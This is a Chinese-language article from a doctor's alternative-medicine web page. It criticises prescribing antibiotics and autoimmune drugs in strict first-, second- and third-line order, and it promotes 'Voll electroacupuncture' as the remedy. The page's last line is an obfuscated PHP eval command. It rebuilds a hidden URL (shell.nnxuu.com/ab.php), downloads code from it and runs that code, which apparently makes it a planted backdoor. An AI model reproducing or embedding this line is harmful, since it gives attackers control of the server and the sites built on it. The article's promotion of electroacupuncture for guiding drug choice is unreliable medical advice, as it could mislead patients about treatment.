收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 第一、二、三線藥物孰先孰後?
第一、二、三線藥物孰先孰後? 列印 E-mail
        目前在台灣有抗生素濫用的情況,幾乎所有醫師都在開同樣的抗生素,很容易產生抗藥性的細菌,造成第一線抗生素的無效。此時醫師面對患者細菌感染時,應該是選用對抗此種細菌有效與適當的抗生素,而不是照著第一、二、三線藥物的順序使用,才能達到在最短的時間消滅細菌及減少抗生素對人體的傷害。

        同樣的狀況最常發生在免疫風濕科中。對於自體免疫疾病治療的藥物也是分為三大線,第一線為類固醇,第二線為免疫抑制劑,第三線為MTX。臨床上使用也都是從第一線開始選用起,效果不彰或無效時,則加用或改用第二線,最後才使用第三線藥物。以現在醫師用藥的習慣,如果一個患者第一、二線藥物都無效,只有第三線藥物有治療效果時,這個患者至少要「忍耐」一個月,並且還要能活著,才有可能接觸第三線藥物。

        如何能幫助醫師跳脫藥物使用的「習慣」,靈活使用第一、二、三線藥物,幫助患者儘快脫離疾病的痛苦?我們深信,「傅爾電針」獨具的功能,就是這個問題最好的答案。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));